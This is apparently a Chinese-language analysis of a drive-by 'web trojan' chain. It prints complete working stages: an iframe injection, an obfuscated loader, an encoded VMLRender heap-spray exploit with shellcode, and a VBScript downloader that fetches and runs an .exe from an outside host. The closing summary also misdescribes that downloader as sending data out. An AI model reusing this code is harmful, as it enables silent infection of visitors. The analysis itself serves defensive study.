经过我的观察推测,此网站(攻击者)先用工具扫描网站服务器上是否存在可以修改源文件的安全漏洞;如果有,再找出所有的 index.htm 文件,然后在文件的最后一行加上一个 iframe,嵌入它网站上植入木马的页面。
iframe标签的代码如下(文中将散播木马的网站域名:“www.zzyqr.com”写成“www.xxx.com”):
<iframe src=http://www.xxx.com/lpf/wm.htm width=0 height=0 frameborder=0></iframe>
我们可以用 FlashGet 下载它嵌入页面的源文件,代码如下:
<script>
<!--
// Loader stage (the page injected via the iframe). The only visible statement is
// document.write(unescape(...)); the percent-encoded text is a VBScript block that
// assembles "ob"&"ject", "cl"&"assid" and "Ad"&"odb.St"&"ream" from string fragments,
// tries to create that object, and on error writes a hidden 1x1 iframe for 2007.htm,
// otherwise one for xiaoH.htm.
// Detection note: document.write(unescape(...)) combined with split ProgID/CLSID
// strings is a recognisable signature for this loader; replacing document.write with
// alert (as the author does below) reveals the decoded text without executing it.
document.write(unescape("%3Chead%3E%3Ctitle%3Exh_New%20Year///%3C/title%3E%0D%0A%3Cscript%20language%3DVBScript%3E%0D%0Aon%20error%20resume%20next%0D%0Aset%20zero%20%3D%20document.createElement%28%22ob%22%20%26%20%22ject%22%29%0D%0Azero.setAttribute%20%22cl%22%20%26%20%22assid%22%2C%20%22cl%22%20%26%20%22sid%3ABD%22%20%26%20%2296C556-65A3-11D0-983A-00C04%22%20%26%20%22FC29E36%22%0D%0Astr3%20%3D%20%22Ad%22%20%26%20%22odb.St%22%20%26%20%22ream%22%0D%0Aset%20F%20%3D%20zero.createobject%28str3%2C%22%22%29%0D%0Aif%20Not%20Err.Number%20%3D%200%20then%0D%0Aerr.clear%0D%0Adocument.write%28%22%3Ci%22+%22frame%20style%3D%27display%3Anone%3B%27%20src%3D2007.htm%20width%3D1%20height%3D1%20frameborder%3D0%3E%3C/i%22+%22frame%3E%22%29%0D%0Aelse%0D%0Adocument.write%28%22%3Ci%22+%22frame%20style%3D%27display%3Anone%3B%27%20src%3DxiaoH.htm%20width%3D1%20height%3D1%20frameborder%3D0%3E%3C/i%22+%22frame%3E%22%29%0D%0Aend%20if%0D%0A%3C/script%3E%0D%0A%3C/head%3E%0D%0A%3C/html%3E%0D%0A%0D%0A%0D%0A"));
//-->
</script>
它对 js 代码做了简单的混淆,但可以看出它使用 document.write 向页面写入内容;我们把 document.write 改成 alert,看一下其真实代码:
它用 js 向页面写入了一段 VBScript 代码;这段 VBScript 试图创建一个 object,如果创建出错,就用 iframe 嵌入另一个页面 2007.htm,否则就用 iframe 嵌入 xiaoH.htm 文件。下面我们下载这两个文件,分别分析它们的意图。
2007.htm文件中的代码如下:
<script language="Javascript">
// Cookie-gated second stage of 2007.htm.
// Checks document.cookie for a "Cookie1=" marker. If it is absent, sets
// Cookie1=POPWIN with a 24-hour expiry and, 5 seconds later, writes a hidden
// 1x1 iframe pointing at xiao.htm. While the cookie is unexpired the branch is
// skipped, so the iframe is not written again on repeat visits.
// Note: `inject` is assigned without var, i.e. an implicit global read by the
// string passed to setTimeout.
function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)  // now + 24h, used as cookie expiry
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
// marker already present: nothing to do
} else
{ document.cookie = "Cookie1=POPWIN;expires="+ Then.toGMTString()
inject = "<iframe style='display:none;' src=xiao.htm width=1 height=1 frameborder=0></iframe>"
setTimeout("document.write(inject)", 5000 );  // delayed write of the hidden iframe
}
}Get();
</script>
这个文件中的代码没有经过任何混淆:它首先写入一个一天之后过期的 cookie,然后又嵌入了另一个页面 xiao.htm。
xiao.htm文件中的代码如下:
<html><title>欢迎购买xiao_2007 Vip网马</title>
<script>
t="60,115,99,114,105,112,116,32,108,97,110,103,117,97,103,101,61,34,74,97,118,97,83,99,114,105,112,116,34,62,13,10,115,99,109,97,105,110,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,52,51,52,51,37,117,52,51,52,51,37,117,52,51,52,51,37,117,97,51,101,57,37,117,48,48,48,48,37,117,53,102,48,48,37,117,97,49,54,52,37,117,48,48,51,48,37,117,48,48,48,48,37,117,52,48,56,98,37,117,56,98,48,99,37,117,49,99,55,48,37,117,56,98,97,100,37,117,48,56,54,56,37,117,102,55,56,98,37,117,48,52,54,97,37,117,101,56,53,57,37,117,48,48,52,51,37,117,48,48,48,48,37,117,102,57,101,50,37,117,54,102,54,56,37,117,48,48,54,101,37,117,54,56,48,48,37,117,55,50,55,53,37,117,54,100,54,99,37,117,102,102,53,52,37,117,57,53,49,54,37,117,50,101,101,56,37,117,48,48,48,48,37,117,56,51,48,48,37,117,50,48,101,99,37,117,100,99,56,98,37,117,50,48,54,97,37,117,102,102,53,51,37,117,48,52,53,54,37,117,48,52,99,55,37,117,53,99,48,51,37,117,50,101,54,49,37,117,99,55,54,53,37,117,48,51,52,52,37,117,55,56,48,52,37,117,48,48,54,53,37,117,51,51,48,48,37,117,53,48,99,48,37,117,53,51,53,48,37,117,53,48,53,55,37,117,53,54,102,102,37,117,56,98,49,48,37,117,53,48,100,99,37,117,102,102,53,51,37,117,48,56,53,54,37,117,53,54,102,102,37,117,53,49,48,99,37,117,56,98,53,54,37,117,51,99,55,53,37,117,55,52,56,98,37,117,55,56,50,101,37,117,102,53,48,51,37,117,56,98,53,54,37,117,50,48,55,54,37,117,102,53,48,51,37,117,99,57,51,51,37,117,52,49,52,57,37,117,48,51,97,100,37,117,51,51,99,53,37,117,48,102,100,98,37,117,49,48,98,101,37,117,100,54,51,97,37,117,48,56,55,52,37,117,99,98,99,49,37,117,48,51,48,100,37,117,52,48,100,97,37,117,102,49,101,98,37,117,49,102,51,98,37,117,101,55,55,53,37,117,56,98,53,101,37,117,50,52,53,101,37,117,100,100,48,51,37,117,56,98,54,54,37,117,52,98,48,99,37,117,53,101,56,98,37,117,48,51,49,99,37,117,56,98,100,100,37,117,56,98,48,52,37,117,99,53,48,51,37,117,53,101,97,98,37,117,99,51,53,57,37,117,53,56,101,56,37,117,102,102,102,102,37,117,56,101,102,102,37,117,48,101,52,101,37,117,99,49,101,99,37,117,101,
53,55,57,37,117,57,56,98,56,37,117,56,97,102,101,37,117,101,102,48,101,37,117,101,48,99,101,37,117,51,54,54,48,37,117,50,102,49,97,37,117,54,56,55,48,37,117,55,52,55,52,37,117,51,97,55,48,37,117,50,102,50,102,37,117,55,55,55,55,37,117,50,101,55,55,37,117,55,55,55,50,37,117,55,55,55,54,37,117,50,101,55,54,37,117,54,102,54,51,37,117,50,102,54,100,37,117,54,51,54,100,37,117,54,98,50,102,37,117,50,101,54,55,37,117,55,56,54,53,37,117,48,48,54,53,34,41,59,115,52,99,61,115,99,109,97,105,110,43,109,121,117,114,108,59,13,10,115,107,49,112,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,48,68,48,68,37,117,48,68,48,68,34,41,59,104,115,49,122,101,32,61,32,50,48,59,13,10,115,99,49,101,110,32,61,32,104,115,49,122,101,43,115,52,99,46,108,101,110,103,116,104,13,10,119,104,105,108,101,32,40,115,107,49,112,46,108,101,110,103,116,104,60,115,99,49,101,110,41,32,115,107,49,112,43,61,115,107,49,112,59,13,10,115,107,105,105,112,32,61,32,115,107,49,112,46,115,117,98,115,116,114,105,110,103,40,48,44,32,115,99,49,101,110,41,59,13,10,120,105,97,111,95,50,48,48,55,32,61,32,115,107,49,112,46,115,117,98,115,116,114,105,110,103,40,48,44,32,115,107,49,112,46,108,101,110,103,116,104,45,115,99,49,101,110,41,59,13,10,119,104,105,108,101,40,120,105,97,111,95,50,48,48,55,46,108,101,110,103,116,104,43,115,99,49,101,110,60,48,120,52,48,48,48,48,41,32,120,105,97,111,95,50,48,48,55,32,61,32,120,105,97,111,95,50,48,48,55,43,120,105,97,111,95,50,48,48,55,43,115,107,105,105,112,59,13,10,109,101,109,116,32,61,32,110,101,119,32,65,114,114,97,121,40,41,59,13,10,32,105,61,48,59,119,104,105,108,101,40,43,43,105,60,53,48,48,41,123,109,101,109,116,91,105,93,32,61,32,120,105,97,111,95,50,48,48,55,32,43,32,115,52,99,59,125,13,10,118,97,114,32,97,49,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,48,100,48,100,34,41,59,13,10,118,97,114,32,98,50,59,13,10,102,111,114,40,105,61,48,59,32,105,60,48,120,49,48,48,45,49,57,59,32,105,43,43,41,32,32,98,50,43,61,97,49,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105
,116,101,40,34,60,104,116,109,34,43,34,108,32,120,109,108,110,115,58,118,61,92,34,117,114,34,43,34,110,58,115,99,104,101,109,34,43,34,97,115,45,109,105,99,34,43,34,114,111,115,111,102,116,45,99,111,109,58,118,34,43,34,109,108,92,34,62,92,114,92,110,34,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,104,101,97,100,62,92,114,92,110,34,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,111,98,106,101,99,116,32,105,100,61,92,34,86,77,34,43,34,76,82,101,110,100,101,114,92,34,32,99,108,97,115,115,105,100,61,92,34,67,76,83,73,68,58,49,48,48,34,43,34,55,50,67,69,67,45,56,67,34,43,34,67,49,45,49,49,68,49,45,57,34,43,34,56,54,69,45,48,34,43,34,48,65,48,67,57,34,43,34,53,53,66,52,50,69,92,34,62,92,114,92,110,34,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,47,111,98,106,101,99,116,62,34,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,115,116,121,108,101,62,34,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,118,92,92,58,42,32,123,32,98,101,104,97,118,105,111,114,58,32,117,114,108,40,35,86,77,76,82,101,110,100,101,114,41,59,32,125,34,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,47,115,116,121,108,101,62,34,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,47,104,101,97,100,62,34,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,118,58,114,101,99,116,32,115,116,121,108,101,61,39,119,105,100,116,104,58,49,50,48,112,116,59,104,101,105,103,104,116,58,56,48,112,116,39,32,102,105,108,108,99,111,108,111,114,61,92,34,103,114,101,101,110,92,34,62,92,114,92,110,34,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,118,58,102,105,108,108,32,109,101,116,104,111,100,61,92,34,34,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,98,50,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,117,110,101,115,99,97,112,101,40,34,37,117
,48,99,48,99,37,117,48,100,48,100,34,41,41,59,13,10,102,111,114,40,105,61,48,59,105,60,49,48,48,59,105,43,43,41,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,98,50,41,59,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,92,34,32,47,62,60,47,118,58,114,101,99,116,62,34,41,13,10,60,47,115,99,114,105,112,116,62"
// Decoding stage: `t` (the literal above) is a comma-separated list of character
// codes. eval("String.fromCharCode(" + t + ")") rebuilds the original source text,
// which is then written into the document. The decoded markup creates an
// <object id=VMLRender ...> element plus VML (v:rect / v:fill) markup whose
// attribute value is padded with repeated data — the VMLRender exploit the author
// identifies below.
// Detection note: eval over String.fromCharCode with a long numeric list is a
// decoder pattern worth flagging in web proxies/IDS; the "404" page that follows
// is a decoy, not a server response.
t=eval("String.fromCharCode("+t+")");
document.write(t);</script>
<script type="text/jscript">function init() {
// Decoy: once the page has loaded (and the exploit markup above has been written),
// overwrite the visible document with a fake "404 Not Found" page whose wording
// mimics an Apache ErrorDocument message. The same function is reused in xiaoH.htm.
// It is client-side text only — the server did not return a 404.
document.writeln("<HEAD><TITLE>404 Not Found<\/TITLE><\/HEAD><BODY>");
document.writeln("<H1>Not Found<\/H1>The requested URL \/codebase\/dff was not found on this server.<P>");
document.writeln("<P>Additionally, a 404 Not Found");
document.writeln("error was encountered while trying to use an ErrorDocument to handle the request.");
document.writeln("<\/BODY>");}window.onload = init;
</script>
</body></html>
通过上面的代码我们可以分析得到,此文件又用 js 写入了一些内容,然后居然显示一个“404 未找到”的标题来蒙骗大家。让我们看看它的 js 到底写了些什么,看下图。
我们可以分析出来,这段代码的最终目的是在页面上写入一个 object:VMLRender;从网上查到,此木马正是利用了 VMLRender 中的漏洞。也就是说到这一步,如果我们的系统没有打补丁,而攻击过程一切正常,木马可能已经被安装了。
以上分析的是第一个病毒页面执行出错时的分支;如果不出错,就会跳到另一个页面 xiaoH.htm。我们可以用 FlashGet 下载得到 xiaoH.htm 中的内容:
<script language="VBScript">
' Downloader stage (xiaoH.htm), reached when the object in the loader was created
' successfully. Every statement runs under On Error Resume Next, so failures are silent.
' What the visible code does, in order: (1) HTTP GET of a remote .exe, (2) build paths
' under GetSpecialFolder(2) (the temp folder), (3) save the response body as a file and
' drop a small .vbs launcher, (4) run the launcher. The same launcher text is also
' written over c:\NTDETECT.EXE — a host artifact worth checking during incident response.
On Error Resume Next
' (1) Remote payload URL and the object used to fetch it. The CLSID and ProgID are
' split into fragments to evade simple string matching on the page source.
QnxyX="http://www.rwvwv.com/mc/kg.exe"
Set RJURL = document.createElement("object")
ccc="clsid:BD96":lll="C556-65":sss="A3-11D":iii="0-983A-00C":ddd="04FC29E36":xxx="Microsoft.X":mmm="MLHTTp"
RJURL.SetAttribute "classid", ccc&lll&sss&iii&ddd
OOBnPl=xxx&mmm
Set MKHbx = RJURL.CreateObject(OOBnPl,"")
MKHbx.Open "GET", QnxyX, False
MKHbx.Send
' (2) Drop-file names; XpTvd is assigned but never used.
MQWLa="~I7PRUGI1VAC.CoM"
SEiDu="~V5SFDYCLNTK.VbS"
XpTvd="~V5SFDYCLNTK.VbS"
SS="Scripting."
cc="FileSyst"
rr="emObject"
Set Kpzwb = RJURL.createobject(SS&cc&rr,"")
Set SrHOx = Kpzwb.GetSpecialFolder(2)
MQWLa=Kpzwb.BuildPath(SrHOx,MQWLa)
SEiDu=Kpzwb.BuildPath(SrHOx,SEiDu)
' (3) Binary stream (type=1) for the downloaded bytes, then text stream (type=2)
' for the launcher script that runs the dropped file.
RR="Adod"
NN="b.stream"
UoNfL=RR&NN
Set HSREb = RJURL.createobject(UoNfL,"")
HSREb.type=1
HSREb.Open
HSREb.Write MKHbx.ResponseBody
HSREb.Savetofile MQWLa,2
HSREb.Close
HSREb.Type=2
HSREb.Open
HSREb.WriteText "Set Shell = CreateObject(""Wscript.Shell"")"&vbCrLf&"Shell.Run ("""&MQWLa&""")"&vbCrLf&"Set Shell = Nothing"
HSREb.Savetofile SEiDu,2
' Second copy of the launcher text overwrites a system file; its presence/modification
' time is an indicator of compromise for this sample.
HSREb.Savetofile "c:\\NTDETECT.EXE",2
HSREb.Close
' (4) Execute the launcher; the trailing 0 requests a hidden window.
WSjog="Shell.Applica"
Set Run = RJURL.createobject(WSjog&"tion","")
Run.ShellExecute SEiDu,"","","Open",0
</script></html><script type="text/jscript">function init() {
// Decoy, identical to the one in xiao.htm: after the VBScript above has run,
// overwrite the visible page with a fake "404 Not Found" body so the visitor
// sees nothing unusual. This is client-side text, not a real server error.
document.writeln("<HEAD><TITLE>404 Not Found<\/TITLE><\/HEAD><BODY>");
document.writeln("<H1>Not Found<\/H1>The requested URL \/codebase\/dff was not found on this server.<P>");
document.writeln("<P>Additionally, a 404 Not Found");
document.writeln("error was encountered while trying to use an ErrorDocument to handle the request.");
document.writeln("<\/BODY>");}window.onload = init;
</script>
病毒脚本在上面的页面中创建了一个对象,然后从中毒的机器中取到了一些数据并发送到目标机器;还保存了一个文件:c:\NTDETECT.EXE。最后又伪装了一下自己,给用户显示一个“404 未找到”的提示信息。
后记:
制造病毒的人是希望通过病毒的传播给自己带去财富,熊猫刚刚被捕,又有人顶风作案,实在是.......。